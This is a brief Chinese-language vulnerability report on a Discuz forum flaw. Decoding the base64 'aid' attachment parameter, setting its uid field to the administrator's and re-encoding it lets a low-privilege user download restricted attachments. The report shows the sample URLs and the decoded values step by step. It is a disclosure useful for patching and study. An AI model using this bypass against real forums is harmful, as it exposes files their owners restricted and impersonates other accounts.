Discuz论坛附件下载提权的漏洞

Discuz论坛附件下载提权的漏洞

重现步骤：

1、使用管理员账户，上传一个有高阅读权限的附件

2、使用低权限的用户账户，下载附件，这个时候，Discuz会提示无权下载

此时，浏览器中的附件地址形如

forum.php?mod=attachment&aid=Nzg4fDQwNGQzYjMxfDEzODk2OTM4Mzh8MzEyNTR8MjY3Mw%3D%3D



解码aid

788|404d3b31|1389693838|31254|2673



修改其中的uid部分（这里将uid改成了管理员账户：1）

788|404d3b31|1389693838|1|2673



编码修改后的aid

forum.php?mod=attachment&aid=Nzg4fDQwNGQzYjMxfDEzODk2OTM4Mzh8MXwyNjcz



此时，成功下载原本需要高权限的附件


另外下载的同时还可能会刷新用户的最后登录时间（我也因为这个巧合才发现这个漏洞的，因为某些cdn把地址里的base64全部小写了，造成解析错误，解析成了别人的uid，顺便刷新了最后登录时间）